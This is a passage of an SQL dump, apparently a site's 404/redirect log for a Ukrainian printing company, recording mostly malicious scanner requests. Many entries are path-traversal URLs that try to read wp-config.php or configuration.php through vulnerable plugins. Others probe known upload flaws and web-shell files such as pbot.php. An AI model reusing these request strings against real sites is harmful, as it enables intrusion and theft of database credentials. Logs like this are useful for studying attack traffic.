00:00:00',301),(434,'http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/+this.active.src+','','http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/jcemediabox.js?01f6bb1635ffb37306d7b368d146f889','',3,0,'2016-02-11 18:19:26','0000-00-00 00:00:00',301),(435,'http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/mediabox.options.popup.google_viewer','','http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/jcemediabox.js?01f6bb1635ffb37306d7b368d146f889','',3,0,'2016-02-11 18:19:26','0000-00-00 00:00:00',301),(436,'http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/+url+','','http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/jcemediabox.js?01f6bb1635ffb37306d7b368d146f889','',4,0,'2016-02-11 18:19:27','0000-00-00 00:00:00',301),(437,'http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/document.location.href;var','','http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/jcemediabox.js?01f6bb1635ffb37306d7b368d146f889','',4,0,'2016-02-11 18:19:27','0000-00-00 00:00:00',301),(438,'http://ekvatorprint.com.ua/b(w|h','','http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/jcemediabox.js?01f6bb1635ffb37306d7b368d146f889','',3,0,'2016-02-11 18:19:27','0000-00-00 00:00:00',301),(439,'http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/this.active.src','','http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/jcemediabox.js?01f6bb1635ffb37306d7b368d146f889','',3,0,'2016-02-11 18:19:27','0000-00-00 00:00:00',301),(440,'http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/$1','','http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/jcemediabox.js?01f6bb1635ffb37306d7b368d146f889','',4,0,'2016-02-11 18:19:27','0000-00-00 00:00:00',301),(441,'http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/v','','http://ekvatorprint.com.ua/plugins/system/jcemediabox/js/jcemediabox.js?01f6bb1635ffb37306d7b368d146f889','',3,0,'2016-02-11 18:19:27','0000-00-00 00:00:00',301),(442,'http://ekvatorprint.com.ua/administrator/includes/pathways.php','','','',1,0,'2016-02-11 22:05:30','0000-00-00 00:00:00',301),(443,'http://ekvatorprint.com.ua/tr­ebovaniya','','','',1,0,'2016-02-12 12:34:34','0000-00-00 00:00:00',301),(444,'http://ekvatorprint.com.ua/clike.su/adbstyles.js?u=101061','','http://ekvatorprint.com.ua/printing-on-canvas','',1,0,'2016-02-12 13:23:11','0000-00-00 00:00:00',301),(445,'http://www.ekvatorprint.com.ua/phpMoAdmin/moadmin.php','','http://www.ekvatorprint.com.ua/phpMoAdmin/moadmin.php','',1,0,'2016-02-15 21:36:48','0000-00-00 00:00:00',301),(446,'http://www.ekvatorprint.com.ua/moadmin.php','','http://www.ekvatorprint.com.ua/moadmin.php','',1,0,'2016-02-15 21:37:01','0000-00-00 00:00:00',301),(447,'http://www.ekvatorprint.com.ua/moadmin/moadmin.php','','http://www.ekvatorprint.com.ua/moadmin/moadmin.php','',1,0,'2016-02-15 21:37:13','0000-00-00 00:00:00',301),(448,'http://www.ekvatorprint.com.ua/phpMoAdmin-MongoDB-Admin-Tool-for-PHP/moadmin.php','','http://www.ekvatorprint.com.ua/phpMoAdmin-MongoDB-Admin-Tool-for-PHP/moadmin.php','',1,0,'2016-02-15 21:37:25','0000-00-00 00:00:00',301),(449,'http://www.ekvatorprint.com.ua/admin/moadmin.php','','http://www.ekvatorprint.com.ua/admin/moadmin.php','',1,0,'2016-02-15 21:37:37','0000-00-00 00:00:00',301),(450,'http://www.ekvatorprint.com.ua/tools/moadmin.php','','http://www.ekvatorprint.com.ua/tools/moadmin.php','',1,0,'2016-02-15 21:37:49','0000-00-00 00:00:00',301),(451,'http://www.ekvatorprint.com.ua/scripts/moadmin.php','','http://www.ekvatorprint.com.ua/scripts/moadmin.php','',1,0,'2016-02-15 21:38:01','0000-00-00 00:00:00',301),(452,'http://ekvatorprint.com.ua/2010-12-01-20-04-31','','','',9,0,'2016-02-16 07:30:55','0000-00-00 00:00:00',301),(453,'http://ekvatorprint.com.ua/language/en-GB/en-GB.xmlindex.php','','http://ekvatorprint.com.ua/language/en-GB/en-GB.xmlindex.php','',1,0,'2016-02-19 01:00:18','0000-00-00 00:00:00',301),(454,'http://ekvatorprint.com.ua/2010-12-01-19-58-29','','','',12,0,'2016-02-19 17:48:51','0000-00-00 00:00:00',301),(455,'http://ekvatorprint.com.ua/icon0.php','','','',18,0,'2016-02-23 04:12:43','0000-00-00 00:00:00',301),(456,'http://ekvatorprint.com.ua/index.php?option=com_easyblog&view=dashboard&layout=entries','','','',6,0,'2016-02-23 13:58:39','0000-00-00 00:00:00',301),(457,'http://ekvatorprint.com.ua/print-ceilings---','','','',2,0,'2016-02-23 14:11:24','0000-00-00 00:00:00',301),(458,'http://ekvatorprint.com.ua/wp-content/plugins/revslider/js/rev_admin.js','','','',2,0,'2016-02-23 14:25:42','0000-00-00 00:00:00',301),(459,'http://ekvatorprint.com.ua/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php','','','',4,0,'2016-02-24 12:34:29','0000-00-00 00:00:00',301),(460,'http://ekvatorprint.com.ua/wp-content/plugins/wp-symposium/server/php/index.php','','','',4,0,'2016-02-24 13:01:45','0000-00-00 00:00:00',301),(461,'http://ekvatorprint.com.ua/wp-content/plugins/dzs-zoomsounds/admin/upload.php','','','',10,0,'2016-02-24 13:04:46','0000-00-00 00:00:00',301),(462,'http://ekvatorprint.com.ua/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php','','','',7,0,'2016-02-24 13:22:26','0000-00-00 00:00:00',301),(463,'http://ekvatorprint.com.ua/wp-content/plugins/wpshop/includes/ajax.php','','','',4,0,'2016-02-24 13:23:02','0000-00-00 00:00:00',301),(464,'http://ekvatorprint.com.ua/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2016&Month=02','','','',2,0,'2016-02-24 13:27:55','0000-00-00 00:00:00',301),(465,'http://ekvatorprint.com.ua/wp-admin/admin-ajax.php?action=widgets_init&Action=UPCP_AddProductSpreadsheet','','','',2,0,'2016-02-24 13:29:03','0000-00-00 00:00:00',301),(466,'http://ekvatorprint.com.ua/wp-content/plugins/ultimate-product-catalogue/product-sheets/wp-setup.php','','','',4,0,'2016-02-24 13:30:07','0000-00-00 00:00:00',301),(467,'http://ekvatorprint.com.ua/images/stories/mil.gif','','','',8,0,'2016-02-24 15:20:29','0000-00-00 00:00:00',301),(468,'http://ekvatorprint.com.ua/images/stories/pbot.php','','','',8,0,'2016-02-24 15:20:29','0000-00-00 00:00:00',301),(469,'http://ekvatorprint.com.ua/component/contact/contact/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','','','',2,0,'2016-02-24 15:21:04','0000-00-00 00:00:00',301),(470,'http://ekvatorprint.com.ua/component/contact/contact/images/stories/mil.gif','','','',2,0,'2016-02-24 15:21:06','0000-00-00 00:00:00',301),(471,'http://ekvatorprint.com.ua/component/contact/contact/images/stories/pbot.php','','','',2,0,'2016-02-24 15:21:07','0000-00-00 00:00:00',301),(472,'http://ekvatorprint.com.ua/component/contact/contact/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',2,0,'2016-02-24 15:21:08','0000-00-00 00:00:00',301),(473,'http://ekvatorprint.com.ua/component/contact/contact/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=mil.php','','','',2,0,'2016-02-24 15:21:10','0000-00-00 00:00:00',301),(474,'http://ekvatorprint.com.ua/component/contact/contact/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','','','',4,0,'2016-02-24 15:21:12','0000-00-00 00:00:00',301),(475,'http://ekvatorprint.com.ua/component/contact/contact/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','','',4,0,'2016-02-24 15:21:14','0000-00-00 00:00:00',301),(476,'http://ekvatorprint.com.ua/component/contact/contact/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','','','',4,0,'2016-02-24 15:21:16','0000-00-00 00:00:00',301),(477,'http://ekvatorprint.com.ua/component/contact/contact/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','','','',2,0,'2016-02-24 15:21:18','0000-00-00 00:00:00',301),(478,'http://ekvatorprint.com.ua/component/contact/contact/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','','','',4,0,'2016-02-24 15:21:20','0000-00-00 00:00:00',301),(479,'http://ekvatorprint.com.ua/component/contact/contact/administrator/components/com_redmystic/chart/ofc-library/ofc_upload_image.php','','','',2,0,'2016-02-24 15:21:22','0000-00-00 00:00:00',301),(480,'http://ekvatorprint.com.ua/component/contact/contact/administrator/components/com_joomleague/assets/classes/open-flash-chart/ofc_upload_image.php','','','',2,0,'2016-02-24 15:21:24','0000-00-00 00:00:00',301),(481,'http://ekvatorprint.com.ua/component/contact/contact/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php','','','',2,0,'2016-02-24 15:21:26','0000-00-00 00:00:00',301),(482,'http://ekvatorprint.com.ua/component/contact/contact/index.php?option=com_jdownloads&Itemid=0&view=upload','','','',2,0,'2016-02-24 15:21:28','0000-00-00 00:00:00',301),(483,'http://ekvatorprint.com.ua/component/contact/contact/cfg-contactform-1/inc/upload.php','','','',2,0,'2016-02-24 15:21:30','0000-00-00 00:00:00',301),(484,'http://ekvatorprint.com.ua/component/contact/contact/cfg-contactform-2/inc/upload.php','','','',2,0,'2016-02-24 15:21:30','0000-00-00 00:00:00',301),(485,'http://ekvatorprint.com.ua/component/contact/contact/cfg-contactform-3/inc/upload.php','','','',2,0,'2016-02-24 15:21:30','0000-00-00 00:00:00',301),(486,'http://ekvatorprint.com.ua/component/contact/contact/cfg-contactform-4/inc/upload.php','','','',2,0,'2016-02-24 15:21:30','0000-00-00 00:00:00',301),(487,'http://ekvatorprint.com.ua/component/contact/contact/cfg-contactform-5/inc/upload.php','','','',2,0,'2016-02-24 15:21:31','0000-00-00 00:00:00',301),(488,'http://ekvatorprint.com.ua/component/contact/contact/cfg-contactform-6/inc/upload.php','','','',2,0,'2016-02-24 15:21:31','0000-00-00 00:00:00',301),(489,'http://ekvatorprint.com.ua/component/contact/contact/cfg-contactform-7/inc/upload.php','','','',2,0,'2016-02-24 15:21:31','0000-00-00 00:00:00',301),(490,'http://ekvatorprint.com.ua/component/contact/contact/cfg-contactform-8/inc/upload.php','','','',2,0,'2016-02-24 15:21:31','0000-00-00 00:00:00',301),(491,'http://ekvatorprint.com.ua/component/contact/contact/cfg-contactform-9/inc/upload.php','','','',2,0,'2016-02-24 15:21:31','0000-00-00 00:00:00',301),(492,'http://ekvatorprint.com.ua/component/contact/contact/cfg-contactform-10/inc/upload.php','','','',2,0,'2016-02-24 15:21:31','0000-00-00 00:00:00',301),(493,'http://ekvatorprint.com.ua/component/contact/contact/cfg-contactform-11/inc/upload.php','','','',2,0,'2016-02-24 15:21:32','0000-00-00 00:00:00',301),(494,'http://ekvatorprint.com.ua/component/contact/contact/cfg-contactform-12/inc/upload.php','','','',2,0,'2016-02-24 15:21:32','0000-00-00 00:00:00',301),(495,'http://ekvatorprint.com.ua/component/contact/contact/components/com_sexycontactform/fileupload/index.php','','','',2,0,'2016-02-24 15:21:32','0000-00-00 00:00:00',301),(496,'http://ekvatorprint.com.ua/component/contact/contact/cfg-contactform-13/inc/upload.php','','','',2,0,'2016-02-24 15:21:33','0000-00-00 00:00:00',301),(497,'http://ekvatorprint.com.ua/component/contact/contact/cfg-contactform-14/inc/upload.php','','','',2,0,'2016-02-24 15:21:33','0000-00-00 00:00:00',301),(498,'http://ekvatorprint.com.ua/component/contact/contact/cfg-contactform-15/inc/upload.php','','','',2,0,'2016-02-24 15:21:33','0000-00-00 00:00:00',301),(499,'http://ekvatorprint.com.ua/component/contact/contact/cfg-contactform-16/inc/upload.php','','','',2,0,'2016-02-24 15:21:33','0000-00-00 00:00:00',301),(500,'http://ekvatorprint.com.ua/component/contact/contact/cfg-contactform-17/inc/upload.php','','','',2,0,'2016-02-24 15:21:34','0000-00-00 00:00:00',301),(501,'http://ekvatorprint.com.ua/component/contact/contact/cfg-contactform-18/inc/upload.php','','','',2,0,'2016-02-24 15:21:34','0000-00-00 00:00:00',301),(502,'http://ekvatorprint.com.ua/component/contact/contact/cfg-contactform-19/inc/upload.php','','','',2,0,'2016-02-24 15:21:34','0000-00-00 00:00:00',301),(503,'http://ekvatorprint.com.ua/component/contact/contact/components/com_creativecontactform/fileupload/index.php','','','',2,0,'2016-02-24 15:21:34','0000-00-00 00:00:00',301),(504,'http://ekvatorprint.com.ua/component/contact/contact/cfg-contactform-20/inc/upload.php','','','',2,0,'2016-02-24 15:21:35','0000-00-00 00:00:00',301),(505,'http://ekvatorprint.com.ua/component/contact/contact/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',2,0,'2016-02-24 15:21:36','0000-00-00 00:00:00',301),(506,'http://ekvatorprint.com.ua/component/contact/contact/components/com_hwdvideoshare/assets/uploads/flash/flash_upload.php?jqUploader=1','','','',2,0,'2016-02-24 15:21:38','0000-00-00 00:00:00',301),(507,'http://ekvatorprint.com.ua/component/contact/contact/index.php?option=com_myblog&task=ajaxupload','','','',2,0,'2016-02-24 15:21:40','0000-00-00 00:00:00',301),(508,'http://ekvatorprint.com.ua/wp-content/themes/infocus/lib/scripts/dl-skin.php','','','',65,0,'2016-02-24 22:38:36','0000-00-00 00:00:00',301),(509,'http://ekvatorprint.com.ua/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php','','','',54,0,'2016-02-24 22:38:44','0000-00-00 00:00:00',301),(510,'http://ekvatorprint.com.ua/wp-content/themes/awake/lib/scripts/dl-skin.php','','','',50,0,'2016-02-24 22:38:51','0000-00-00 00:00:00',301),(511,'http://ekvatorprint.com.ua/wp-content/themes/echelon/lib/scripts/dl-skin.php','','','',50,0,'2016-02-24 22:38:57','0000-00-00 00:00:00',301),(512,'http://ekvatorprint.com.ua/wp-admin/admin-ajax.php?action=getfile&/../../wp-config.php','','','',18,0,'2016-02-24 22:39:03','0000-00-00 00:00:00',301),(513,'http://ekvatorprint.com.ua/wp-content/themes/dejavu/lib/scripts/dl-skin.php','','','',50,0,'2016-02-24 22:39:10','0000-00-00 00:00:00',301),(514,'http://ekvatorprint.com.ua/wp-content/themes/elegance/lib/scripts/dl-skin.php','','','',50,0,'2016-02-24 22:39:16','0000-00-00 00:00:00',301),(515,'http://ekvatorprint.com.ua/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php','','','',54,0,'2016-02-24 22:39:22','0000-00-00 00:00:00',301),(516,'http://ekvatorprint.com.ua/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php','','','',50,0,'2016-02-24 22:39:29','0000-00-00 00:00:00',301),(517,'http://ekvatorprint.com.ua/wp-content/themes/construct/lib/scripts/dl-skin.php','','','',50,0,'2016-02-24 22:39:35','0000-00-00 00:00:00',301),(518,'http://ekvatorprint.com.ua/wp-content/themes/method/lib/scripts/dl-skin.php','','','',50,0,'2016-02-24 22:39:41','0000-00-00 00:00:00',301),(519,'http://ekvatorprint.com.ua/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download','','','',50,0,'2016-02-24 22:39:47','0000-00-00 00:00:00',301),(520,'http://ekvatorprint.com.ua/wp-content/themes/persuasion/lib/scripts/dl-skin.php','','','',50,0,'2016-02-24 22:39:53','0000-00-00 00:00:00',301),(521,'http://ekvatorprint.com.ua/wp-content/themes/modular/lib/scripts/dl-skin.php','','','',50,0,'2016-02-24 22:39:59','0000-00-00 00:00:00',301),(522,'http://ekvatorprint.com.ua/wp-content/themes/myriad/lib/scripts/dl-skin.php','','','',50,0,'2016-02-24 22:40:04','0000-00-00 00:00:00',301),(523,'http://ekvatorprint.com.ua/wp-admin/admin-ajax.php?action=fe_get_sv_html&video=../wp-config.php','','','',5,0,'2016-02-24 22:40:11','0000-00-00 00:00:00',301),(524,'http://ekvatorprint.com.ua/wp-content/themes/parallelus-mingle/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php','','','',50,0,'2016-02-24 22:40:17','0000-00-00 00:00:00',301),(525,'http://ekvatorprint.com.ua/wp-content/themes/lote27/download.php?download=../../../wp-config.php','','','',52,0,'2016-02-24 22:40:24','0000-00-00 00:00:00',301),(526,'http://ekvatorprint.com.ua/wp-content/themes/fusion/lib/scripts/dl-skin.php','','','',50,0,'2016-02-24 22:40:29','0000-00-00 00:00:00',301),(527,'http://ekvatorprint.com.ua/wp-content/themes/parallelus-salutation/framework/utilities/download/getfile.php?file=../../../../../../wp-config.php','','','',50,0,'2016-02-24 22:40:36','0000-00-00 00:00:00',301),(528,'http://ekvatorprint.com.ua/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php','','','',50,0,'2016-02-24 22:40:42','0000-00-00 00:00:00',301),(529,'http://ekvatorprint.com.ua/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php','','','',49,0,'2016-02-24 22:40:49','0000-00-00 00:00:00',301),(530,'http://ekvatorprint.com.ua/wp-content/plugins/pica-photo-gallery/picadownload.php?imgname=../../../wp-config.php','','','',50,0,'2016-02-24 22:41:02','0000-00-00 00:00:00',301),(531,'http://ekvatorprint.com.ua/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php','','','',50,0,'2016-02-24 22:41:08','0000-00-00 00:00:00',301),(532,'http://ekvatorprint.com.ua/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php','','','',50,0,'2016-02-24 22:41:15','0000-00-00 00:00:00',301),(533,'http://ekvatorprint.com.ua/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php','','','',49,0,'2016-02-24 22:41:22','0000-00-00 00:00:00',301),(534,'http://ekvatorprint.com.ua/wp-content/themes/infocus2/lib/scripts/dl-skin.php','','','',50,0,'2016-02-24 22:41:28','0000-00-00 00:00:00',301),(535,'http://ekvatorprint.com.ua/wp-content/themes/epic/includes/download.php?file=../../../../wp-config.php','','','',50,0,'2016-02-24 22:41:35','0000-00-00 00:00:00',301),(536,'http://ekvatorprint.com.ua/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php','','','',49,0,'2016-02-24 22:41:42','0000-00-00 00:00:00',301),(537,'http://ekvatorprint.com.ua/wp-content/plugins/plugin-newsletter/preview.php?data=../../../../wp-config.php','','','',50,0,'2016-02-24 22:41:50','0000-00-00 00:00:00',301),(538,'http://ekvatorprint.com.ua/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=../../../../wp-config.php','','','',50,0,'2016-02-24 22:41:57','0000-00-00 00:00:00',301),(539,'http://ekvatorprint.com.ua/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php','','','',50,0,'2016-02-24 22:42:03','0000-00-00 00:00:00',301),(540,'http://ekvatorprint.com.ua/wp-content/force-download.php?file=../wp-config.php','','','',50,0,'2016-02-24 22:42:10','0000-00-00 00:00:00',301),(541,'http://ekvatorprint.com.ua/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php','','','',50,0,'2016-02-24 22:42:17','0000-00-00 00:00:00',301),(542,'http://ekvatorprint.com.ua/m/outdoor-advertising','','','',2,0,'2016-02-28 16:35:44','0000-00-00 00:00:00',301),(543,'http://ekvatorprint.com.ua/www.zip','','','',5,0,'2016-02-28 17:44:12','0000-00-00 00:00:00',301),(544,'http://ekvatorprint.com.ua/public_html.zip','','','',7,0,'2016-02-29 01:51:22','0000-00-00 00:00:00',301),(545,'http://ekvatorprint.com.ua/wsdl.php?adv=phpinfo(INFO_GENERAL);','','','',1,0,'2016-02-29 14:11:35','0000-00-00 00:00:00',301),(546,'http://ekvatorprint.com.ua/images/.jindex.php','','','',5,0,'2016-02-29 14:11:35','0000-00-00 00:00:00',301),(547,'http://ekvatorprint.com.ua/tmp/.jindex.php','','','',3,0,'2016-02-29 14:11:36','0000-00-00 00:00:00',301),(548,'http://ekvatorprint.com.ua/cfg.php','','','',1,0,'2016-03-02 01:02:03','0000-00-00 00:00:00',301),(549,'http://ekvatorprint.com.ua/config.php','','','',25,0,'2016-03-02 01:02:04','0000-00-00 00:00:00',301),(550,'http://ekvatorprint.com.ua/blog/xmlrpc.php','','','',21,0,'2016-03-02 01:08:05','0000-00-00 00:00:00',301),(551,'http://www.ekvatorprint.com.ua/apple-touch-icon-precomposed.png','','','',5,0,'2016-03-02 06:29:02','0000-00-00 00:00:00',301),(552,'http://www.ekvatorprint.com.ua/apple-touch-icon.png','','','',5,0,'2016-03-02 06:29:03','0000-00-00 00:00:00',301),(553,'http://ekvatorprint.com.ua/admon','','','',1,0,'2016-03-02 13:07:19','0000-00-00 00:00:00',301),(554,'http://www.ekvatorprint.com.ua/readme-ical.txt','','http://www.ekvatorprint.com.ua/readme-ical.txt','',1,0,'2016-03-02 15:37:33','0000-00-00 00:00:00',301),(555,'http://www.ekvatorprint.com.ua/COPYRIGHT.txt','','http://www.ekvatorprint.com.ua/COPYRIGHT.txt','',1,0,'2016-03-02 15:37:37','0000-00-00 00:00:00',301),(556,'http://www.ekvatorprint.com.ua/yeager/COPYRIGHT.txt','','http://www.ekvatorprint.com.ua/yeager/COPYRIGHT.txt','',1,0,'2016-03-02 15:37:37','0000-00-00 00:00:00',301),(557,'http://ekvatorprint.com.ua/images/stories/petx.php?baca','','','',8,0,'2016-03-03 05:11:10','0000-00-00 00:00:00',301),(558,'http://ekvatorprint.com.ua/images/stories/explore.php?baca','','','',8,0,'2016-03-03 05:11:12','0000-00-00 00:00:00',301),(559,'http://ekvatorprint.com.ua/images/stories/magic.php.png','','','',10,0,'2016-03-03 05:11:33','0000-00-00 00:00:00',301),(560,'http://ekvatorprint.com.ua/images/stories/magic.php.png?baca','','','',2,0,'2016-03-03 05:11:33','0000-00-00 00:00:00',301),(561,'http://ekvatorprint.com.ua/component/contact/contact/images/stories/petx.php?baca','','','',2,0,'2016-03-03 05:11:34','0000-00-00 00:00:00',301),(562,'http://ekvatorprint.com.ua/component/contact/contact/images/stories/explore.php?baca','','','',2,0,'2016-03-03 05:11:36','0000-00-00 00:00:00',301),(563,'http://ekvatorprint.com.ua/component/contact/contact/images/stories/magic.php.png','','','',3,0,'2016-03-03 05:11:56','0000-00-00 00:00:00',301),(564,'http://ekvatorprint.com.ua/component/contact/contact/images/stories/magic.php.png?baca','','','',1,0,'2016-03-03 05:11:56','0000-00-00 00:00:00',301),(565,'http://ekvatorprint.com.ua/index.php?option=com_fireboard&Itemid=0&id=1&catid=0&func=fb_pdf\'','','','',3,0,'2016-03-04 03:25:59','0000-00-00 00:00:00',301),(566,'http://ekvatorprint.com.ua/undefined','','','',13,0,'2016-03-04 04:35:33','0000-00-00 00:00:00',301),(567,'http://ekvatorprint.com.ua/printing-on-canvashttp:/ekvatorprint.com.ua/printing-on-canvas','','','',5,0,'2016-03-04 12:33:13','0000-00-00 00:00:00',301),(568,'http://ekvatorprint.com.ua/index.php?option=com_user&task=register','','','',21,0,'2016-03-04 19:55:58','0000-00-00 00:00:00',301),(569,'http://ekvatorprint.com.ua/index.php/component/user/?task=register','','','',8,0,'2016-03-04 21:48:44','0000-00-00 00:00:00',301),(570,'http://ekvatorprint.com.ua/index.php?option=com_users&view=register','','','',7,0,'2016-03-05 09:06:41','0000-00-00 00:00:00',301),(571,'http://ekvatorprint.com.ua/index.php?option=com_user&view=registration','','','',7,0,'2016-03-05 09:17:55','0000-00-00 00:00:00',301),(572,'http://ekvatorprint.com.ua/index.php/component/user/?view=registration','','','',7,0,'2016-03-05 09:28:33','0000-00-00 00:00:00',301),(573,'http://ekvatorprint.com.ua/uploadify/uploadify.css','','','',5,0,'2016-03-05 12:18:42','0000-00-00 00:00:00',301),(574,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=72','','','',32,0,'2016-03-05 14:42:54','0000-00-00 00:00:00',301),(575,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=74','','','',9,0,'2016-03-06 02:46:38','0000-00-00 00:00:00',301),(576,'http://ekvatorprint.com.ua/index.php?option=com_vitabook','','','',24,0,'2016-03-06 08:03:13','0000-00-00 00:00:00',301),(577,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=75','','','',8,0,'2016-03-06 10:53:24','0000-00-00 00:00:00',301),(578,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=76','','','',8,0,'2016-03-06 13:01:55','0000-00-00 00:00:00',301),(579,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=77','','','',8,0,'2016-03-06 14:19:16','0000-00-00 00:00:00',301),(580,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=78','','','',4,0,'2016-03-06 20:41:27','0000-00-00 00:00:00',301),(581,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=79','','','',4,0,'2016-03-06 21:26:12','0000-00-00 00:00:00',301),(582,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=80','','','',4,0,'2016-03-06 22:03:27','0000-00-00 00:00:00',301),(583,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=81','','','',4,0,'2016-03-07 05:27:11','0000-00-00 00:00:00',301),(584,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=82','','','',4,0,'2016-03-07 08:20:43','0000-00-00 00:00:00',301),(585,'http://ekvatorprint.com.ua/this.id','','','',8,0,'2016-03-07 09:31:26','0000-00-00 00:00:00',301),(586,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=83','','','',4,0,'2016-03-07 15:06:48','0000-00-00 00:00:00',301),(587,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=84','','','',7,0,'2016-03-07 15:39:50','0000-00-00 00:00:00',301),(588,'http://ekvatorprint.com.ua/index.php?option=com_k2&view=itemlist&task=user&id=85','','','',3,0,'2016-03-09 01:29:49','0000-00-00 00:00:00',301),(589,'http://ekvatorprint.com.ua/1234t.php','','http://www.googlebot.com/bot.html','',1,0,'2016-03-09 09:50:19','0000-00-00 00:00:00',301),(590,'http://ekvatorprint.com.ua/wp-content/uploads/wpfoot1.php','','http://www.googlebot.com/bot.html','',1,0,'2016-03-09 09:58:07','0000-00-00 00:00:00',301),(591,'http://ekvatorprint.com.ua/images/phocagallery/Bannera/20150806183453.jpg','','http://ekvatorprint.com.ua/banner-printing','',6,0,'2016-03-09 10:05:55','0000-00-00 00:00:00',301),(592,'http://www.ekvatorprint.com.ua/cgi-mod/header_logo.cgi','','','',1,0,'2016-03-09 10:11:10','0000-00-00 00:00:00',301),(593,'http://www.ekvatorprint.com.ua/images/powered_by.gif','','','',1,0,'2016-03-09 10:11:10','0000-00-00 00:00:00',301),(594,'http://www.ekvatorprint.com.ua/issmall','','','',1,0,'2016-03-09 10:11:11','0000-00-00 00:00:00',301),(595,'http://www.ekvatorprint.com.ua/images/login-page.gif','','','',1,0,'2016-03-09 10:11:13','0000-00-00 00:00:00',301),(596,'http://www.ekvatorprint.com.ua/web-console','','','',1,0,'2016-03-09 10:11:13','0000-00-00 00:00:00',301),(597,'http://www.ekvatorprint.com.ua/admin-console','','','',1,0,'2016-03-09 10:11:14','0000-00-00 00:00:00',301),(598,'http://www.ekvatorprint.com.ua/manager/status','','','',2,0,'2016-03-09 10:11:15','0000-00-00 00:00:00',301),(599,'http://www.ekvatorprint.com.ua/manager/html','','','',1,0,'2016-03-09 10:11:15','0000-00-00 00:00:00',301),(600,'http://www.ekvatorprint.com.ua/doku.php','','','',1,0,'2016-03-09 10:11:17','0000-00-00 00:00:00',301),(601,'http://www.ekvatorprint.com.ua/shop/','','','',3,0,'2016-03-09 10:11:17','0000-00-00 00:00:00',301),(602,'http://www.ekvatorprint.com.ua/mall/','','','',3,0,'2016-03-09 10:11:17','0000-00-00 00:00:00',301),(603,'http://www.ekvatorprint.com.ua/eshop/','','','',3,0,'2016-03-09 10:11:18','0000-00-00 00:00:00',301),(604,'http://www.ekvatorprint.com.ua/shops/','','','',3,0,'2016-03-09 10:11:18','0000-00-00 00:00:00',301),(605,'http://www.ekvatorprint.com.ua/ecshop/','','','',1,0,'2016-03-09 10:11:22','0000-00-00 00:00:00',301),(606,'http://www.ekvatorprint.com.ua/skin/frontend/default/modern/css/styles.css','','','',1,0,'2016-03-09 10:11:23','0000-00-00 00:00:00',301),(607,'http://www.ekvatorprint.com.ua/stylesheet.css','','','',1,0,'2016-03-09 10:11:23','0000-00-00 00:00:00',301),(608,'http://www.ekvatorprint.com.ua/includes/general.js','','','',1,0,'2016-03-09 10:11:24','0000-00-00 00:00:00',301),(609,'http://www.ekvatorprint.com.ua/User/Login.aspx','','','',1,0,'2016-03-09 10:11:25','0000-00-00 00:00:00',301),(610,'http://www.ekvatorprint.com.ua/License.txt','','','',4,0,'2016-03-09 10:11:26','0000-00-00 00:00:00',301),(611,'http://www.ekvatorprint.com.ua/API/DW/Dwplugin/TemplateManage/manage_site.htm','','','',1,0,'2016-03-09 10:11:26','0000-00-00 00:00:00',301),(612,'http://www.ekvatorprint.com.ua/API/DW/Dwplugin/TemplateManage/save_template.htm','','','',1,0,'2016-03-09 10:11:27','0000-00-00 